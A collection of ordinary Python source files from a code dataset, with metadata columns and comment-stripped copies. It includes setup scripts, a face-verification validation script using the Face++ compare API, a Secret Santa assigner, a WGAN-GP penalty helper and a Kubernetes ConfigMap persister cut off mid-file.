for rel in current_relation:
if rel in ['question-column-partialmatch', 'question-table-partialmatch']:
idx_list.append(1)
elif rel in ['question-column-exactmatch', 'question-table-exactmatch']:
idx_list.append(2)
elif rel in ['question-column-valuematch']:
idx_list.append(3)
elif rel in ['question-table-nomatch', 'question-column-nomatch']:
idx_list.append(4)
elif rel in ['table-column-pk']:
idx_list.append(5)
elif rel in ['table-column-has']:
idx_list.append(6)
elif rel in ['column-column-fk']:
idx_list.append(7)
elif rel in ['Forward-Syntax', 'Backward-Syntax', 'None-Syntax']:
idx_list.append(dummy_idx)
dummy_idx += 1
else:
idx_list.append(0)
else:
raise NotImplementedError
RELATION2ID_DICT = dict(zip(current_relation, idx_list))
idx_list.append(0)
current_relation.append("None")
ID2RELATION_DICT = dict(zip(idx_list, current_relation))
return RELATION2ID_DICT, ID2RELATION_DICT, max(idx_list) | none | 1 | 2.682308 | 3 | |
tests/inspectortodo/validator/__init__.py | code-acrobat/InspectorTodo | 8 | 6617408 | <reponame>code-acrobat/InspectorTodo
# Copyright 2018 TNG Technology Consulting GmbH, Unterföhring, Germany
# Licensed under the Apache License, Version 2.0 - see LICENSE.md in project root directory
| # Copyright 2018 TNG Technology Consulting GmbH, Unterföhring, Germany
# Licensed under the Apache License, Version 2.0 - see LICENSE.md in project root directory | en | 0.643204 | # Copyright 2018 TNG Technology Consulting GmbH, Unterföhring, Germany # Licensed under the Apache License, Version 2.0 - see LICENSE.md in project root directory | 0.83033 | 1 |
wtl/wtparser/parsers/base.py | elegion/djangodash2013 | 0 | 6617409 | <reponame>elegion/djangodash2013
from __future__ import unicode_literals
import re
class BaseParser(object):
language = 'unknown'
filename = 'unknown'
def detect(self, content):
return False
def _detect_by_regex(self, content, pats):
return any(re.compile(p, re.MULTILINE).search(content) for p in pats)
def get_platform(self, lines):
return None
def get_version(self, lines):
return None
def get_packages(self, lines):
return None
def parse(self, content):
lines = content.splitlines()
return {
'filename': self.filename,
'language': self.language,
'platform': self.get_platform(lines),
'version': self.get_version(lines),
'packages': self.get_packages(lines),
}
| from __future__ import unicode_literals
import re
class BaseParser(object):
language = 'unknown'
filename = 'unknown'
def detect(self, content):
return False
def _detect_by_regex(self, content, pats):
return any(re.compile(p, re.MULTILINE).search(content) for p in pats)
def get_platform(self, lines):
return None
def get_version(self, lines):
return None
def get_packages(self, lines):
return None
def parse(self, content):
lines = content.splitlines()
return {
'filename': self.filename,
'language': self.language,
'platform': self.get_platform(lines),
'version': self.get_version(lines),
'packages': self.get_packages(lines),
} | none | 1 | 2.66283 | 3 | |
setup.py | joezuntz/DESC_BPZ | 0 | 6617410 | <gh_stars>0
from setuptools import setup, find_namespace_packages
packages = find_namespace_packages()
setup(
name="desc_bpz",
version="0.0.1",
author="<NAME>, <NAME>, <NAME>,"
"<NAME>, LSST DESC PZWG",
author_email="<EMAIL>",
packages=packages,
package_data={
"": ["*.h5", "*.yaml", "*.sed", "*.res",
"*.AB", "*.columns", "*.pars"],
"tests": ["*.h5", "*.yaml"],
"SED": ["*.sed"],
"FILTER": ["*.res"],
"AB": ["*.AB"],
"scripts": ["*.columns, *.pars"]
},
include_package_data=True,
license="BSD 3-Clause License",
description="Python3 version of BPZ used in DESC",
url="https://github.com/LSSTDESC/DESC_BPZ",
long_description=open("README.md").read(),
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: BSD 3-Clause",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python"
],
install_requires=['numpy',
'scipy',
'pandas>=1.1',
'h5py',
],
python_requires='>=3.5',
setup_requires=['pytest-runner'],
tests_require=['pytest'],
)
| from setuptools import setup, find_namespace_packages
packages = find_namespace_packages()
setup(
name="desc_bpz",
version="0.0.1",
author="<NAME>, <NAME>, <NAME>,"
"<NAME>, LSST DESC PZWG",
author_email="<EMAIL>",
packages=packages,
package_data={
"": ["*.h5", "*.yaml", "*.sed", "*.res",
"*.AB", "*.columns", "*.pars"],
"tests": ["*.h5", "*.yaml"],
"SED": ["*.sed"],
"FILTER": ["*.res"],
"AB": ["*.AB"],
"scripts": ["*.columns, *.pars"]
},
include_package_data=True,
license="BSD 3-Clause License",
description="Python3 version of BPZ used in DESC",
url="https://github.com/LSSTDESC/DESC_BPZ",
long_description=open("README.md").read(),
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: BSD 3-Clause",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python"
],
install_requires=['numpy',
'scipy',
'pandas>=1.1',
'h5py',
],
python_requires='>=3.5',
setup_requires=['pytest-runner'],
tests_require=['pytest'],
) | none | 1 | 1.502804 | 2 | |
setup.py | philastrophist/pygmmis | 0 | 6617411 | from setuptools import setup
setup(
name="pygmmis",
description="Gaussian mixture model for incomplete, truncated, and noisy data",
long_description="Gaussian mixture model for incomplete, truncated, and noisy data",
version='1.1.0',
author="<NAME>",
author_email="<EMAIL>",
license='MIT',
py_modules=["pygmmis"],
url="https://github.com/pmelchior/pygmmis",
classifiers=[
"Development Status :: 5 - Production/Stable",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Information Analysis"
],
requires=["numpy","scipy","multiprocessing","parmap"]
)
| from setuptools import setup
setup(
name="pygmmis",
description="Gaussian mixture model for incomplete, truncated, and noisy data",
long_description="Gaussian mixture model for incomplete, truncated, and noisy data",
version='1.1.0',
author="<NAME>",
author_email="<EMAIL>",
license='MIT',
py_modules=["pygmmis"],
url="https://github.com/pmelchior/pygmmis",
classifiers=[
"Development Status :: 5 - Production/Stable",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Information Analysis"
],
requires=["numpy","scipy","multiprocessing","parmap"]
)
| none | 1 | 0.981673 | 1 | |
src/spaceone/inventory/model/load_balancer.py | choonho/plugin-google-cloud-compute-inven-collector | 3 | 6617412 | from schematics import Model
from schematics.types import StringType, IntType, DictType, ListType
class LoadBalancer(Model):
type = StringType(choices=('HTTP', 'TCP', 'UDP'))
name = StringType()
dns = StringType(default="")
port = ListType(IntType())
protocol = ListType(StringType())
scheme = StringType(choices=('EXTERNAL', 'INTERNAL'))
tags = DictType(StringType, default={})
| from schematics import Model
from schematics.types import StringType, IntType, DictType, ListType
class LoadBalancer(Model):
type = StringType(choices=('HTTP', 'TCP', 'UDP'))
name = StringType()
dns = StringType(default="")
port = ListType(IntType())
protocol = ListType(StringType())
scheme = StringType(choices=('EXTERNAL', 'INTERNAL'))
tags = DictType(StringType, default={})
| none | 1 | 2.585566 | 3 | |
validateResult.py | mundanePeo/faceRecognition | 14 | 6617413 | <reponame>mundanePeo/faceRecognition<gh_stars>10-100
from requests_toolbelt import MultipartEncoder
from datetime import date, timedelta
from tqdm import tqdm
from config.configLoad import config_data
import requests
import base64
import os
import json
import argparse
BASE_DIR = 'static/people'
people_list = os.listdir(BASE_DIR)
url = 'https://api-cn.faceplusplus.com/facepp/v3/compare'
getDay = None
def getSomeday(day=1):
today = date.today()
oneday = timedelta(days=day)
someday = today-oneday
return someday
def prepare():
global getDay
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--date", type=int, default=1, help="验证指定日期的识别结果,1代表以今天为基准向前一天也即昨天")
args = parser.parse_args()
d = args.date
getDay = getSomeday(d)
test_pair = os.path.join('static', f'{getDay}_resultRecord.txt')
return test_pair
def getData(file_path):
if not os.path.exists(file_path) or not (isinstance(file_path, str) and file_path.endswith('.txt')):
raise FileExistsError
with open(file_path, 'r') as f:
test_data = f.readlines()
return test_data
def validation(test_data: list):
if len(people_list) == 0:
raise FileNotFoundError
count = 0.
far = 0.
frr = 0.
sum = len(test_data)
runningLog = []
runningLog.append(str(getDay))
runningLog.append("\n")
print("————————————————————validation start!————————————————————")
for i in tqdm(range(len(test_data))):
file1, _ = test_data[i].split(' ')
# print("now : ", file1)
runningLog.append(file1)
runningLog.append("\t")
_ = _.strip('\n')
respeo = 0
end = 0.
with open(file1, 'rb') as f:
img1 = base64.b64encode(f.read()).decode()
for j in range(len(people_list)):
peo = people_list[j]
peo_dir = os.path.join(BASE_DIR, peo)
img_list = os.listdir(peo_dir)
index = 0
while True:
file2 = os.path.join(peo_dir, img_list[index])
# print("validate image ", file2)
with open(file2, 'rb') as f:
img2 = base64.b64encode(f.read()).decode()
params = MultipartEncoder(fields={'api_key': config_data['validate']['api_key'],
'api_secret': config_data['validate']['api_secret'],
'image_base64_1': img1,
'image_base64_2': img2
},)
r = requests.post(url, data=params, headers={'Content-Type': params.content_type})
result = r.content
result = result.decode()
result = dict(json.loads(result))
# print(result)
if 'error_message' not in result.keys():
if 'confidence' not in result.keys() or 'thresholds' not in result.keys():
break
confidence = result['confidence']
thresh = result['thresholds']
if confidence <= thresh['1e-3']:
output = 0
elif confidence >= thresh['1e-5']:
output = 1
else:
output = 1
if output == 1:
respeo = int(peo)
break
index += 1
else:
if str(result['error_message']) not in runningLog:
runningLog.append(str(result['error_message']))
runningLog.append("\t")
break
index += 1
if index == 3:
end = j
break
if respeo != 0:
break
elif end == len(people_list)-1 and index == 3:
respeo = -3
elif end < len(people_list)-1 and index < 3:
respeo = -2
break
# print("final id is ", respeo)
# print("initial id is ", _)
runningLog.append(f"final:{respeo}\t")
runningLog.append(f"initial:{_}\n")
with open('runningLog.txt', 'a+') as f:
f.writelines(runningLog)
runningLog.clear()
if respeo == int(_):
count += 1
elif respeo == -3 or ((10000001<=respeo<=10000009) and respeo != int(_)):
far += 1
else:
sum -= 1
with open('validateResult.txt', 'a+') as f:
line = [str(getDay), '\t', f'precision: {count/sum}\t', f'far: {far}\t', f'frrProb: {far/sum}\n']
f.writelines(line)
print("————————————————————validation end!————————————————————")
if __name__ == "__main__":
try:
file_name = prepare()
test_data = getData(file_name)
validation(test_data)
except FileExistsError as e:
print("The record of your input day is not exist!")
except FileNotFoundError as e:
print("Don't find images in static/people")
| from requests_toolbelt import MultipartEncoder
from datetime import date, timedelta
from tqdm import tqdm
from config.configLoad import config_data
import requests
import base64
import os
import json
import argparse
BASE_DIR = 'static/people'
people_list = os.listdir(BASE_DIR)
url = 'https://api-cn.faceplusplus.com/facepp/v3/compare'
getDay = None
def getSomeday(day=1):
today = date.today()
oneday = timedelta(days=day)
someday = today-oneday
return someday
def prepare():
global getDay
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--date", type=int, default=1, help="验证指定日期的识别结果,1代表以今天为基准向前一天也即昨天")
args = parser.parse_args()
d = args.date
getDay = getSomeday(d)
test_pair = os.path.join('static', f'{getDay}_resultRecord.txt')
return test_pair
def getData(file_path):
if not os.path.exists(file_path) or not (isinstance(file_path, str) and file_path.endswith('.txt')):
raise FileExistsError
with open(file_path, 'r') as f:
test_data = f.readlines()
return test_data
def validation(test_data: list):
if len(people_list) == 0:
raise FileNotFoundError
count = 0.
far = 0.
frr = 0.
sum = len(test_data)
runningLog = []
runningLog.append(str(getDay))
runningLog.append("\n")
print("————————————————————validation start!————————————————————")
for i in tqdm(range(len(test_data))):
file1, _ = test_data[i].split(' ')
# print("now : ", file1)
runningLog.append(file1)
runningLog.append("\t")
_ = _.strip('\n')
respeo = 0
end = 0.
with open(file1, 'rb') as f:
img1 = base64.b64encode(f.read()).decode()
for j in range(len(people_list)):
peo = people_list[j]
peo_dir = os.path.join(BASE_DIR, peo)
img_list = os.listdir(peo_dir)
index = 0
while True:
file2 = os.path.join(peo_dir, img_list[index])
# print("validate image ", file2)
with open(file2, 'rb') as f:
img2 = base64.b64encode(f.read()).decode()
params = MultipartEncoder(fields={'api_key': config_data['validate']['api_key'],
'api_secret': config_data['validate']['api_secret'],
'image_base64_1': img1,
'image_base64_2': img2
},)
r = requests.post(url, data=params, headers={'Content-Type': params.content_type})
result = r.content
result = result.decode()
result = dict(json.loads(result))
# print(result)
if 'error_message' not in result.keys():
if 'confidence' not in result.keys() or 'thresholds' not in result.keys():
break
confidence = result['confidence']
thresh = result['thresholds']
if confidence <= thresh['1e-3']:
output = 0
elif confidence >= thresh['1e-5']:
output = 1
else:
output = 1
if output == 1:
respeo = int(peo)
break
index += 1
else:
if str(result['error_message']) not in runningLog:
runningLog.append(str(result['error_message']))
runningLog.append("\t")
break
index += 1
if index == 3:
end = j
break
if respeo != 0:
break
elif end == len(people_list)-1 and index == 3:
respeo = -3
elif end < len(people_list)-1 and index < 3:
respeo = -2
break
# print("final id is ", respeo)
# print("initial id is ", _)
runningLog.append(f"final:{respeo}\t")
runningLog.append(f"initial:{_}\n")
with open('runningLog.txt', 'a+') as f:
f.writelines(runningLog)
runningLog.clear()
if respeo == int(_):
count += 1
elif respeo == -3 or ((10000001<=respeo<=10000009) and respeo != int(_)):
far += 1
else:
sum -= 1
with open('validateResult.txt', 'a+') as f:
line = [str(getDay), '\t', f'precision: {count/sum}\t', f'far: {far}\t', f'frrProb: {far/sum}\n']
f.writelines(line)
print("————————————————————validation end!————————————————————")
if __name__ == "__main__":
try:
file_name = prepare()
test_data = getData(file_name)
validation(test_data)
except FileExistsError as e:
print("The record of your input day is not exist!")
except FileNotFoundError as e:
print("Don't find images in static/people") | en | 0.632409 | # print("now : ", file1) # print("validate image ", file2) # print(result) # print("final id is ", respeo) # print("initial id is ", _) | 2.506389 | 3 |
WorkingDirectory/DaisyPipeline/transformers/ca_cnib_rtf2dtbook/rtf2xml-py/rtf2xml/get_char_map.py | sensusaps/RoboBraille.Web.API | 7 | 6617414 | #########################################################################
# #
# #
# copyright 2002 <NAME> #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU #
# General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program; if not, write to the Free Software #
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA #
# 02111-1307 USA #
# #
# #
#########################################################################
import sys, os, rtf2xml.copy, string
class GetCharMap:
"""
Return the character map for the given value
"""
def __init__(self, bug_handler, char_file):
"""
Required:
'char_file'--the file with the mappings
Returns:
nothing
"""
self.__char_file = char_file
def get_char_map(self, map):
found_map = 0
map_dict = {}
read_obj = open(self.__char_file, 'r')
line = 1
while line:
line = read_obj.readline()
begin_element = '<%s>' % map;
end_element = '</%s>' % map
if not found_map:
if string.find(line, begin_element) >= 0:
found_map = 1
else:
if string.find(line, end_element) >= 0:
break
else:
line = line[:-1]
fields = line.split(':')
fields[1].replace('\\colon', ':')
map_dict[fields[1]] = fields[3]
read_obj.close()
if not found_map:
msg = 'no map found\n'
msg += 'map is "%s"\n'
raise self.__bug_handler, msg
return map_dict
| #########################################################################
# #
# #
# copyright 2002 <NAME> #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU #
# General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program; if not, write to the Free Software #
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA #
# 02111-1307 USA #
# #
# #
#########################################################################
import sys, os, rtf2xml.copy, string
class GetCharMap:
"""
Return the character map for the given value
"""
def __init__(self, bug_handler, char_file):
"""
Required:
'char_file'--the file with the mappings
Returns:
nothing
"""
self.__char_file = char_file
def get_char_map(self, map):
found_map = 0
map_dict = {}
read_obj = open(self.__char_file, 'r')
line = 1
while line:
line = read_obj.readline()
begin_element = '<%s>' % map;
end_element = '</%s>' % map
if not found_map:
if string.find(line, begin_element) >= 0:
found_map = 1
else:
if string.find(line, end_element) >= 0:
break
else:
line = line[:-1]
fields = line.split(':')
fields[1].replace('\\colon', ':')
map_dict[fields[1]] = fields[3]
read_obj.close()
if not found_map:
msg = 'no map found\n'
msg += 'map is "%s"\n'
raise self.__bug_handler, msg
return map_dict
| en | 0.599726 | ######################################################################### # # # # # copyright 2002 <NAME> # # # # This program is distributed in the hope that it will be useful, # # but WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # # General Public License for more details. # # # # You should have received a copy of the GNU General Public License # # along with this program; if not, write to the Free Software # # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA # # 02111-1307 USA # # # # # ######################################################################### Return the character map for the given value Required: 'char_file'--the file with the mappings Returns: nothing | 2.922932 | 3 |
ss.py | tylerparsons/secretsanta | 1 | 6617415 | import sys
import random
import secretsanta as ss
import datetime as dt
# CSV column mappings
FAM_MEMBER_COL = 0
FAM_FAMILY_COL = 1
CONN_SOURCE_COL = 0
CONN_TARGET_COL = 1
CONN_YEAR_COL = 2
def loadFamilyMembers(csvPath):
'''
Returns families, a map of members to their
associated families, and members, a map of
families to a set of its members.
'''
with open(csvPath, 'r') as file:
families = {}
members = {}
for line in file:
data = line.strip().split(',')
member = data[FAM_MEMBER_COL]
family = data[FAM_FAMILY_COL]
families[member] = family
if family not in members:
members[family] = set()
members[family].add(member)
return families, members
def loadConnections(csvPath, families, members):
with open(csvPath, 'r') as file:
connections = ss.ConnectionGraph(families,
members)
for line in file:
data = line.strip().split(',')
source = data[CONN_SOURCE_COL]
target = data[CONN_TARGET_COL]
year = data[CONN_YEAR_COL]
connections.add(source, target, year)
return connections
def saveConnections(csvPath, connections):
with open(csvPath, 'w') as file:
file.write('giver,receiver,year,weight\n')
for conn in connections:
file.write(','.join([
conn.source,
conn.target,
str(conn.year),
str(conn.weight)
]) + '\n')
def main():
argc = len(sys.argv)
if argc != 4 and argc != 5:
print('usage: ss.py <familyFile> <oldConnFile> ' +
'<newConnFile> [<connYear>]')
exit(1)
familyFile = sys.argv[1]
oldConnFile = sys.argv[2]
newConnFile = sys.argv[3]
connYear = int(sys.argv[4]) if argc == 5 else dt.datetime.now().year
families, members = loadFamilyMembers(familyFile)
oldConnections = loadConnections(oldConnFile,
families,
members)
santa = ss.SecretSanta(families, members, oldConnections)
newConnections = santa.genConnections(connYear)
totalWeight = sum(conn.weight for conn in newConnections)
print('Generated new connections for %d with total weight %d'
% (connYear, totalWeight))
saveConnections(newConnFile, newConnections)
if __name__ == '__main__':
main()
| import sys
import random
import secretsanta as ss
import datetime as dt
# CSV column mappings
FAM_MEMBER_COL = 0
FAM_FAMILY_COL = 1
CONN_SOURCE_COL = 0
CONN_TARGET_COL = 1
CONN_YEAR_COL = 2
def loadFamilyMembers(csvPath):
'''
Returns families, a map of members to their
associated families, and members, a map of
families to a set of its members.
'''
with open(csvPath, 'r') as file:
families = {}
members = {}
for line in file:
data = line.strip().split(',')
member = data[FAM_MEMBER_COL]
family = data[FAM_FAMILY_COL]
families[member] = family
if family not in members:
members[family] = set()
members[family].add(member)
return families, members
def loadConnections(csvPath, families, members):
with open(csvPath, 'r') as file:
connections = ss.ConnectionGraph(families,
members)
for line in file:
data = line.strip().split(',')
source = data[CONN_SOURCE_COL]
target = data[CONN_TARGET_COL]
year = data[CONN_YEAR_COL]
connections.add(source, target, year)
return connections
def saveConnections(csvPath, connections):
with open(csvPath, 'w') as file:
file.write('giver,receiver,year,weight\n')
for conn in connections:
file.write(','.join([
conn.source,
conn.target,
str(conn.year),
str(conn.weight)
]) + '\n')
def main():
argc = len(sys.argv)
if argc != 4 and argc != 5:
print('usage: ss.py <familyFile> <oldConnFile> ' +
'<newConnFile> [<connYear>]')
exit(1)
familyFile = sys.argv[1]
oldConnFile = sys.argv[2]
newConnFile = sys.argv[3]
connYear = int(sys.argv[4]) if argc == 5 else dt.datetime.now().year
families, members = loadFamilyMembers(familyFile)
oldConnections = loadConnections(oldConnFile,
families,
members)
santa = ss.SecretSanta(families, members, oldConnections)
newConnections = santa.genConnections(connYear)
totalWeight = sum(conn.weight for conn in newConnections)
print('Generated new connections for %d with total weight %d'
% (connYear, totalWeight))
saveConnections(newConnFile, newConnections)
if __name__ == '__main__':
main()
| en | 0.965213 | # CSV column mappings Returns families, a map of members to their associated families, and members, a map of families to a set of its members. | 2.821219 | 3 |
python/test/test_1_3_URLify.py | cjoverbay/cracking-the-code-interview-solutions | 0 | 6617416 | <gh_stars>0
import unittest
from python.solution.chapter_01_arrays_and_strings import problem_1_3_URLify
# Grab all specific implementations from this solution
implementations = []
for attr in [getattr(problem_1_3_URLify, x) for x in dir(problem_1_3_URLify)]:
if callable(attr):
implementations.append(attr)
class Tests(unittest.TestCase):
def setUp(self):
pass
def test_handles_spaces(self):
for urlify in implementations:
self.assertSequenceEqual(urlify([c for c in 'Mr <NAME> ']), [c for c in 'Mr%20John%20Smith'])
def test_handles_empty(self):
for urlify in implementations:
self.assertSequenceEqual(urlify([]), [])
def test_handles_no_spaces(self):
for urlify in implementations:
self.assertSequenceEqual(urlify([c for c in 'nospaces']), [c for c in 'nospaces'])
| import unittest
from python.solution.chapter_01_arrays_and_strings import problem_1_3_URLify
# Grab all specific implementations from this solution
implementations = []
for attr in [getattr(problem_1_3_URLify, x) for x in dir(problem_1_3_URLify)]:
if callable(attr):
implementations.append(attr)
class Tests(unittest.TestCase):
def setUp(self):
pass
def test_handles_spaces(self):
for urlify in implementations:
self.assertSequenceEqual(urlify([c for c in 'Mr <NAME> ']), [c for c in 'Mr%20John%20Smith'])
def test_handles_empty(self):
for urlify in implementations:
self.assertSequenceEqual(urlify([]), [])
def test_handles_no_spaces(self):
for urlify in implementations:
self.assertSequenceEqual(urlify([c for c in 'nospaces']), [c for c in 'nospaces']) | en | 0.790878 | # Grab all specific implementations from this solution | 3.157712 | 3 |
utils.py | kanesp/Image_WGAN_GP | 7 | 6617417 | <gh_stars>1-10
import os
import matplotlib.pyplot as plt
import numpy as np
import torch
from torch.autograd import Variable
import torch.autograd as autograd
def mkdir(dir):
if not os.path.exists(dir):
os.makedirs(dir)
def savefig(fname, dpi=None):
dpi = 150 if dpi == None else dpi
plt.savefig(fname, dpi=dpi, format='png')
cuda = True if torch.cuda.is_available() else False
Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
def compute_gradient_penalty(D, real_samples, fake_samples):
"""Calculates the gradient penalty loss for WGAN GP"""
# Random weight term for interpolation between real and fake samples
alpha = Tensor(np.random.random((real_samples.size(0), 1, 1, 1)))
# Get random interpolation between real and fake samples
interpolates = (alpha * real_samples + ((1 - alpha) * fake_samples)).requires_grad_(True)
d_interpolates = D(interpolates)
fake = Variable(Tensor(real_samples.shape[0], 1).fill_(1.0), requires_grad=False)
# Get gradient w.r.t. interpolates
gradients = autograd.grad(
outputs=d_interpolates,
inputs=interpolates,
grad_outputs=fake,
create_graph=True,
retain_graph=True,
only_inputs=True,
)[0]
gradients = gradients.view(gradients.size(0), -1)
gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean()
return gradient_penalty
| import os
import matplotlib.pyplot as plt
import numpy as np
import torch
from torch.autograd import Variable
import torch.autograd as autograd
def mkdir(dir):
if not os.path.exists(dir):
os.makedirs(dir)
def savefig(fname, dpi=None):
dpi = 150 if dpi == None else dpi
plt.savefig(fname, dpi=dpi, format='png')
cuda = True if torch.cuda.is_available() else False
Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
def compute_gradient_penalty(D, real_samples, fake_samples):
"""Calculates the gradient penalty loss for WGAN GP"""
# Random weight term for interpolation between real and fake samples
alpha = Tensor(np.random.random((real_samples.size(0), 1, 1, 1)))
# Get random interpolation between real and fake samples
interpolates = (alpha * real_samples + ((1 - alpha) * fake_samples)).requires_grad_(True)
d_interpolates = D(interpolates)
fake = Variable(Tensor(real_samples.shape[0], 1).fill_(1.0), requires_grad=False)
# Get gradient w.r.t. interpolates
gradients = autograd.grad(
outputs=d_interpolates,
inputs=interpolates,
grad_outputs=fake,
create_graph=True,
retain_graph=True,
only_inputs=True,
)[0]
gradients = gradients.view(gradients.size(0), -1)
gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean()
return gradient_penalty | en | 0.794879 | Calculates the gradient penalty loss for WGAN GP # Random weight term for interpolation between real and fake samples # Get random interpolation between real and fake samples # Get gradient w.r.t. interpolates | 2.271276 | 2 |
Codeforces/A_Little_Elephant_and_Rozdil.py | anubhab-code/Competitive-Programming | 0 | 6617418 | n=int(input())
z=list(map(int,input().split()))
k=min(z)
if z.count(k)>=2:
print("Still Rozdil")
else:
print(z.index(k)+1) | n=int(input())
z=list(map(int,input().split()))
k=min(z)
if z.count(k)>=2:
print("Still Rozdil")
else:
print(z.index(k)+1) | none | 1 | 3.280355 | 3 | |
python_module/SuperGLU/Util/Tests/Suite.py | GeneralizedLearningUtilities/SuperGLU | 8 | 6617419 | <filename>python_module/SuperGLU/Util/Tests/Suite.py<gh_stars>1-10
import unittest
import SuperGLU.Util.Tests.TestGenerator_UnitTests as TestGenerator_UnitTests
import SuperGLU.Util.Tests.Serialization_UnitTests as Serialization_UnitTests
def TestSuite():
"""
Returns a TestSuite object that covers the Util module
"""
suite = unittest.TestSuite()
loader = unittest.TestLoader()
modules = [TestGenerator_UnitTests,
Serialization_UnitTests]
for m in modules:
suite.addTests(loader.loadTestsFromModule(m))
return suite
if __name__ == "__main__":
import sys
sys.exit(not unittest.TextTestRunner().run(TestSuite()))
| <filename>python_module/SuperGLU/Util/Tests/Suite.py<gh_stars>1-10
import unittest
import SuperGLU.Util.Tests.TestGenerator_UnitTests as TestGenerator_UnitTests
import SuperGLU.Util.Tests.Serialization_UnitTests as Serialization_UnitTests
def TestSuite():
"""
Returns a TestSuite object that covers the Util module
"""
suite = unittest.TestSuite()
loader = unittest.TestLoader()
modules = [TestGenerator_UnitTests,
Serialization_UnitTests]
for m in modules:
suite.addTests(loader.loadTestsFromModule(m))
return suite
if __name__ == "__main__":
import sys
sys.exit(not unittest.TextTestRunner().run(TestSuite()))
| en | 0.482674 | Returns a TestSuite object that covers the Util module | 2.047481 | 2 |
kubedriver/persistence/config_map_persister.py | manojn97/kubernetes-driver | 2 | 6617420 | <filename>kubedriver/persistence/config_map_persister.py
from kubernetes.client.rest import ApiException
from kubedriver.kubeobjects import ObjectConfiguration, ObjectAttributes
from .exceptions import RecordNotFoundError, PersistenceError, InvalidRecordError
from openshift.dynamic.exceptions import DynamicApiError, NotFoundError, BadRequestError
class ConfigMapPersister:
def __init__(self, stored_type_name, kube_api_ctl, storage_namespace, record_builder, cm_api_version='v1', cm_kind='ConfigMap', cm_data_field='data'):
self.stored_type_name = stored_type_name
self.kube_api_ctl = kube_api_ctl
self.storage_namespace = storage_namespace
self.record_builder = record_builder
self.cm_api_version = cm_api_version
self.cm_kind = cm_kind
self.cm_data_field = cm_data_field
def __raise_error(self, operation, exception, config_map_name):
if isinstance(exception, DynamicApiError):
summary = exception.summary()
else:
summary = str(exception)
message = f'Failed to {operation} record for {self.stored_type_name} \'{config_map_name}\' as an error occurred: {summary}'
if isinstance(exception, NotFoundError):
raise RecordNotFoundError(message) from exception
elif isinstance(exception, BadRequestError):
raise InvalidRecordError(message) from exception
else:
raise PersistenceError(message) from exception
def build_record_reference(self, uid, record_name):
return {
'apiVersion': self.cm_api_version,
'kind': self.cm_kind,
'metadata': {
'name': record_name,
'namespace': self.storage_namespace,
'uid': uid
}
}
def get_record_uid(self, record_name):
record_cm = self.__get_config_map_for(record_name)
return record_cm.metadata.uid
def create(self, record_name, record_data, labels=None):
cm_config = self.__build_config_map_for_record(record_name, record_data, labels=labels)
try:
self.kube_api_ctl.create_object(cm_config, default_namespace=self.storage_namespace)
except ApiException as e:
self.__raise_error('create', e, record_name)
def update(self, record_name, record_data):
existing_cm = self.__get_config_map_for(record_name)
cm_config = self.__build_config_map_for_record(record_name, record_data, existing_cm=existing_cm)
try:
self.kube_api_ctl.update_object(cm_config, default_namespace=self.storage_namespace)
except ApiException as e:
self.__raise_error('update', e, record_name)
def __get_config_map_for(self, record_name):
try:
record_cm = self.kube_api_ctl.read_object(self.cm_api_version, self.cm_kind, record_name, namespace=self.storage_namespace)
return record_cm
except ApiException as e:
self.__raise_error('read', e, record_name)
def get(self, record_name):
record_cm = self.__get_config_map_for(record_name)
return self.__read_config_map_to_record(record_cm)
def delete(self, record_name):
try:
self.kube_api_ctl.delete_object(self.cm_api_version, self.cm_kind, record_name, namespace=self.storage_namespace)
except ApiException as e:
self.__raise_error('delete', e, record_name)
def __build_config_map_for_record(self, record_name, record_data, labels=None, existing_cm=None):
if labels == None:
labels = {}
if existing_cm is not None and existing_cm.metadata is not None and existing_cm.metadata.labels is not None:
merged_labels = {}
merged_labels.update(existing_cm.metadata.labels)
merged_labels.update(labels)
labels = merged_labels
cm_obj_config = {
ObjectAttributes.API_VERSION: self.cm_api_version,
ObjectAttributes.KIND: self.cm_kind,
ObjectAttributes.METADATA: {
ObjectAttributes.NAME: record_name,
ObjectAttributes.NAMESPACE: self.storage_namespace,
ObjectAttributes.LABELS: labels
},
self.cm_data_field: {
'record': self.record_builder.to_record(record_data)
}
}
return ObjectConfiguration(cm_obj_config)
def __read_config_map_to_record(self, config_map):
cm_data = config_map.data
record_data = cm_data.get('record')
return self.record_builder.from_record(record_data)
| <filename>kubedriver/persistence/config_map_persister.py
from kubernetes.client.rest import ApiException
from kubedriver.kubeobjects import ObjectConfiguration, ObjectAttributes
from .exceptions import RecordNotFoundError, PersistenceError, InvalidRecordError
from openshift.dynamic.exceptions import DynamicApiError, NotFoundError, BadRequestError
class ConfigMapPersister:
def __init__(self, stored_type_name, kube_api_ctl, storage_namespace, record_builder, cm_api_version='v1', cm_kind='ConfigMap', cm_data_field='data'):
self.stored_type_name = stored_type_name
self.kube_api_ctl = kube_api_ctl
self.storage_namespace = storage_namespace
